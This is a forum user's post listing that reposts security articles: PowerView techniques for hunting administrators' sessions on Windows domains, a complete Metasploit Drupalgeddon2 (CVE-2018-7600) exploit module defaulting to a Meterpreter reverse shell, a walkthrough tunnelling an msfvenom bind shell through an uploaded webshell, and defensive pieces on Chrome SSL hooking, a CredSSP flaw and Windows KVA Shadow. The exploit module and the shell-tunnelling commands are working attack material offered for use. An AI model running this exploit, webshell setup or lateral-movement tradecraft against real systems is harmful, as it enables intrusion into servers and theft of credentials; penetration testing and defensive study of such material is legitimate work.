-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
“I Hunt Sys Admins” Published January 19, 2015 by harmj0y [Edit 8/13/15] – Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0: Get-NetGroups -> Get-NetGroup Get-UserProperties -> Get-UserProperty Invoke-UserFieldSearch -> Find-UserField Get-NetSessions -> Get-NetSession Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X Get-NetProcesses -> Get-NetProcess Get-UserLogonEvents -> Get-UserEvent Invoke-UserEventHunter -> Invoke-EventHunter [Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs and all the other organizers, volunteers, and sponsors for putting on a cool event! [Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015, the slides are up here. One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the Hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access, and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing what users log in to what boxes from where can also give you a better understanding of a network layout and implicit trust relationships. This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then will show some of the efforts I’ve implemented with PowerView. I really like the concept of “Offense in Depth“- in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong. Existing Tools and Tradecraft The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating. Another “old school” tool we’ve used in the past is netsess.exe, a part of the joeware utilities. It also takes advantage of the NetSessionEnum call, and doesn’t need administrative privileges on a remote host. Think of a “net session” that works on remote machines. PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged in user for a particular system. However, you do need to have admin access on machines you’re running it against. Rob Fuller (@mubix’s) netview.exe project is a tool we’ve used heavily since it’s release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged on users. It can now also check share access, highlight high value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine. Nmap‘s flexible scripting engine also gives us some options. If you have a valid domain account, or local account valid for several machines, you can use smb-enum-sessions.nse to get remote session information from a remote box. And you don’t need admin privileges! If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check any headers for given email chains. The “X-Originating-IP” header is often present, and can let you trace where a user sent a given email from. Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote tasklistings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section. And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which can give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts. Active Directory: It’s a Feature! Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up. Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can also sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. They key here is that you’re using AD information to identify servers that several users are likely connected to. And the best part is, you don’t need any elevated privileges to query this type of user information! Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for some more information. This is also something that the prolific Carlos Perez talked about at at Derbycon 2014. Once you get domain admin, but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) write a great post on offensive event parsing for the purposes of user hunting. We’ll return to this as well shortly. PowerShell PowerShell PowerShell Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release with PSReflect makes it super easy to play with this lower-level access. This is something I’ve written about before. PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions that help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down users to hunt for. For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, userlist, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using those NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the resulting target user set. Everything is flexible, letting you define who to hunt for where. Again, admin privileges are not needed. Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from user.HomeDirectories, and runs a Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its more noisy brother if we can’t find what we need. A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process/tasklists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating. The last user hunting function in PowerView is the weaponized version of @sixdub‘s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC. If I missed any tools or approaches, please let me know! Sursa: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Drupalgeddon2', 'Description' => %q{ CVE-2018-7600 / SA-CORE-2018-002 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. The module can load msf PHP arch payloads, using the php/base64 encoder. The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' }, 'License' => MSF_LICENSE, 'Author' => [ 'Vitalii Rudnykh', # initial PoC 'Hans Topo', # further research and ruby port 'José Ignacio Rojo' # further research and msf module ], 'References' => [ ['SA-CORE', '2018-002'], ['CVE', '2018-7600'], ], 'DefaultOptions' => { 'encoder' => 'php/base64', 'payload' => 'php/meterpreter/reverse_tcp', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => [ARCH_PHP], 'Targets' => [ ['User register form with exec', {}], ], 'DisclosureDate' => 'Apr 15 2018', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), ]) register_advanced_options( [ ]) end def uri_path normalize_uri(target_uri.path) end def exploit_user_register data = Rex::MIME::Message.new data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"') data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"') data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"') data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"') data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"') post_data = data.to_s # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri_path}user/register", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'vars_get' => { 'element_parents' => 'account/mail/#value', 'ajax_form' => '1', '_wrapper_format' => 'drupal_ajax', } }) end ## # Main ## def exploit case datastore['TARGET'] when 0 exploit_user_register else fail_with(Failure::BadConfig, "Invalid target selected.") end end end Sursa: https://www.exploit-db.com/exploits/44482/
-
Interactive bindshell over HTTP By Kevin April 18, 2018 Primitives needed Webshell on a webserver Intro What do you do when you have exploited this webserver and really want an interactive shell, but the network has zero open ports and the only way in is through http port 80 on the webserver you’ve exploited? The answer is simple. Tunnel your traffic inside HTTP using the existing webserver. We previously have had this issue and had some messy solutions and sometimes just an open port by luck. Therefore we wanted a more generic approach that could be reused everytime we have a webshell. We started writing our tool called webtunfwd which did what we wanted. It listened on a local port on our attacking machine and then when we connected to the local port, it would then post whatever was inside socket.recv to a webserver with a POST request. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim. Note: The diagram below is taken from the Tunna project’s github So this is a little walkthrough on what happens: Attacker uploads webtunfwd.php to victim which is now placed on victim:80/webtunfwd.php Attacker uploads his malware and/or a meterpreter bindshell which listens on localhost:20000 Victim is now listening on localhost:20000 Attacker calls webtunfwd.php?broker which connects to localhost:20000 and keeps the connection open. webtunfwd.php?broker reads from socket and writes it to a tempfile we’ll call out.tmp webtunfwd.php?broker reads from a tempfile we’ll call in.tmp and writes it to the socket Great. Now we have webtunfwd.php?broker which handles the socket connection on the victim side and keeps it open forever. We now need to write and read from the two files in.tmp and out.tmp respectively, down to our attacking machine. This is handeled by our python script local.py Attacker runs local.py on his machine which listens on the port localhost:11337 Attacker now connects with the meterpreter client to localhost:11337 When local.py recieves the connection it creates 2 threads. One for read and one for write The read thread reads from socket and writes to in.tmp by creating a POST request with the data to webtunfwd.php?write The write thread reads from out.tmp by creating a GET request to webtunfwd.php?read and writes to the socket So with this code we now have a dynamic port forwarding through HTTP and we can run whatever payload on the server we want. But after writing this tool we searched google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by posting our own tool that didn’t get nearly as much love as the Tunna project did we’re going to show how Tunna is used in action with a bind shell. Systems setup Victim -> Windows 2012 server Attacker -> Some Linux Distro Prerequisites Ability to upload a shell to a webserver Setting up Tunna The first thing we need to do in order to setup Tunna is to clone the git repository. On the attacking machine run: git clone https://github.com/SECFORCE/Tunna In this project we have quite some files. The ones we are going to use are proxy.py and then the contents of webshells In order for Tunna to work we are first going to upload the webshell that will handle the proxy connection/port forwarding to the victim machine In the webshells folder you’ll find conn.aspx - Use whatever method or vulnerability you are exploiting to get it onto the machine. As for now we’re going to assume that the shell conn.aspx is placed on http://victim.com/conn.aspx Tunna is now setup and ready to use Generating a payload We’re now going to generate our backdoor which is a simple shell via metasploit. The shell is going to listen on localhost:12000 which could be any port on localhost as we’ll connect to it through Tunna As we want to run our shell on a windows server running ASPX, we are going to build our backdoor in ASPX format with the use of MSFVENOM We use the following command: msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx --platform Target platform -a Target architecture -p Payload to use LPORT what port to listen on, on target LHOST the IP of where we are listening -f the output format of the payload --out where to save the file After running this command we should now have shell.aspx In the same way that we uploaded conn.aspx we should upload shell.aspx. So now we assume that you have the following two files available: http://victim.com/conn.aspx http://victim.com/shell.aspx Launching the attack So everything is setup. Tunna is uploaded to the server and we have our backdoor ready. The first thing we’re going to do is go to http://victim.com/shell.aspx We can now see that our shell is listening on port 12000 on our attacking machine after running a netstat -na Now we go to our attacking machine. We need two things for connecting. The first is our proxy.py from Tunna, and the next is our metasploit console for connecting. First we forward the local port 10000 to port 12000 on the remote host with the following command: python proxy.py -u http://target.com/conn.aspx -l 10000 -r 12000 -v --no-socks -u - The target url with the path to the webshell uploaded -l - The local port to listen on, on the attacking machine -r - The remote port to connect to, on the victim machine -v - verbosity --no-socks - Do not create a socks proxy. Only port forwarding needed The output will look like the following when it awaits connections: The attacking machine now listens locally on port 10000 and we can connect to it through metasploit In order to do this we configure metasploit the following way: And after that is done we enter run. We should now get a shell: The Tunna status terminal will look like this: Conclusions A full TCP connection wrapped in HTTP in order to evade strict firewalls and the like. We could’ve exchanged our normal shell with anything we wanted to as Tunna simply forwards the port for us. Performance suggestions for projects like Tunna We’ve experienced with some performance upgrades to the tunna project. One thing that we did not like was the amount of HTTP GET/POST requests sent to and from the server. Our solution to this was to use Transfer-encoding: Chunked. This enabled us to open a GET request and recieve bytes whenever ready and then wait for the next read from the socket without ever closing the GET request. We researched many ways to do this over POST, towards the server but we could’nt seem to circumvent that web servers like apache had some internal buffering on chunks retrieved, that was set to 8192 bytes Sursa: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
-
Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
-
- 2
-
-
Hooking Chrome’s SSL functions ON 26 FEBRUARY 2018 BY NYTROSECURITY The purpose of NetRipper is to capture functions that encrypt or decrypt data and send them through the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL exported functions: PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls, is that we cannot easily find the functions inside the huge chrome.dll file. So we have to manually find them in the binary. But how can we do it? Chrome’s source code In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code. Articol complet: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
- 1 reply
-
- 2
-
-
-
Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit
Nytro replied to KRONZY.'s topic in Exploituri
1. Stack based buffer overflow 2. Care e rezultatul acestui exploit? -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/ -
From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886] In March 2013 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. The vulnerability consists of a design flaw in CredSSP, which is a Security Support Provider involved in the Microsoft Remote Desktop and Windows Remote Management (Including Powershell sessions). An attacker with complete Man in the Middle (MITM) control over such a session can abuse it to run an arbitrary code on the target server on behalf of the user! This vulnerability affects all windows versions. Download this white paper to learn: How Preempt Researchers found the vulnerability How we were able to exploit authentication in MS-RDP What you need to do to protect your organization Download now. Sursa: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
-
- 1
-
-
KVA Shadow: Mitigating Meltdown on Windows swiat March 23, 2018 On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post. Vulnerability description & background The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code. Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architecturalstate of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out of order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory. Operating system implications Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode. A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. When designing KVA shadow, several design considerations applied for trap handling when KVA shadow were active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist (or be “shadowed into”) in the user address space are only those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS. This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow in order to avoid any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below). Fielding a trap with KVA shadow active Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for a kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur: The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code. Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread. The current stack must be switched to the per-kernel-thread stack. At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event. These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel 